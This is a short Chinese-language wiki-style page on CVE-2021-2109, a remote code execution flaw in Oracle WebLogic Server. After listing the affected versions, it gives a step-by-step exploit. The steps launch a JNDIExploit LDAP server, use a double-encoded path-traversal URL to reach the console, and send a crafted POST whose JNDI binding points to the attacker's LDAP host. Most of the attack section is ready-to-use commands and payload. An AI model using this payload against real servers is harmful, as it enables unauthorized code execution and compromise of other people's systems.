CVE-2021-2109_Weblogic_Server遠程代碼執行漏洞

# CVE-2021-2109 Weblogic Server遠程代碼執行漏洞

{| style=”margin: auto; width: 750px;”
| style=”text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;” |
{| cellspacing=”2px”
| valign=”middle” | [[Image:Book.png|50px]]
| 這個頁面的內容缺少參考,無法保證內容的準確性。
|}
|}

==影響版本==
Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0

==漏洞利用==
下載[https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11 LDAP] (LDAP需要Java1.8環境)。

java -jar JNDIExploit-v1.11.jar -i 192.168.1.123

首頁URL後加入

/console/css/%252e%252e%252f/consolejndi.portal

在Burp中,将get修改爲post,並且構造數據包。

注:192.168.1;123 有個點修改爲分號。

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;123:1389/Basic/WeblogicEcho;AdminServer%22)
© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容